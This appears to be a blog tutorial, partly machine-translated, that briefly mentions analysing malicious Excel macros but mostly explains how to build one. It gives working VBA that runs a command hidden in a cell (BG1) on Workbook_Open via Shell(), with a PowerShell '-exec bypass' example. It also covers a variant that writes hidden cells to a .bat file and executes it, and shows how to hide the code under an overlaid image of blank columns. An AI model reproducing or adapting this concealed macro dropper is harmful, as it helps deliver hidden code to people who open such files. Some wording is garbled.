With the following method, we will do an analysis of a malicious document that contains a macro, which is slightly more difficult than an .exe analysis, but not impossible.
NOTE: Simply running a tool like oledump or olevba will return macros to the document.
All it will show is that the macro extracts code from a specific column and executes it using Shell (), which is shown below to be suspicious:
And if we navigate to BG1 where the code appears, we do not immediately see anything suspicious:
But if you hover your mouse over the BG1 (or just look a little closer and notice the columns not aligning), then you will see that there is an image that overlaps the code:
Obviously someone with a little more patience could refine the screenshot of the blank columns and overlay it over the code to make it less noticeable.
Another way to reveal the code extracted from its worksheet.excel is using the MsgBox :
Creating the document
- Screenshot of a set of blank columns for overlay over code, for example
- Macros that extract code from the workbook and execute data:
Private Sub Workbook_Open() Data = Sheet1.Range("BG1") Shell(Data) End Sub
- Data = Sheet1.Range (“BG1”) Just look at the row in BG1, extract everything in the row and place it inside the variable Data
- Code that will be exported and executed when the document is opened and the user clicks on "Enable Content"
powershell.exe -exec bypass -C echo "Hello world" > C:\Users\Desktop\Conduct\Desktop\test.txt
After entering the code in any column you want, simply insert the image of the blank columns above the code (Insert> Illustrations> Images)
Then import the macros into ThisWorkbook and change the section Range () to match your column. If you entered the data in column A and it is in the 1st row, it would be range (“A1”)
Compose multiple lines in a file
Writing multiple lines in a file is a simple piece and only requires adding a few lines of code.
The macro code used is here:
Private Sub Workbook_Open ()
1. Dim Path As String
2. Dim FileNumber As Integer
3. FileNumber = FreeFile
4. Data = Sheet1.Range (“BG1”)
5. Data2 = Sheet1.Range (“BG2”)
6. Path = “test.bat”
7. Open Path For Output As FileNumber
8. Print #FileNumber, Data
9. Print #FileNumber, Data2
10. Close FileNumber 11. Shell (Path) End Sub
- Lines 1-3 are static, keep them as they are. They just define the variables used
- Lines 4-6 are dynamic. You will need to change the strings to 4 & 5 so that it is where your code is in worksheet terms excel. Change line 6 to the file path you want.
- Lines 7-9 are also dynamic, just open the file and write the extracted data to the file. Lines 8 & 9 in particular are the lines that are responsible for compiling the data in the file.
Simply enter the code you want to write to a file, note the column and row in which it is located, and change the Data & Data1 variable to fit your column and row (add more variables if needed).
Then overlay the code with the blank line screenshot and you're done!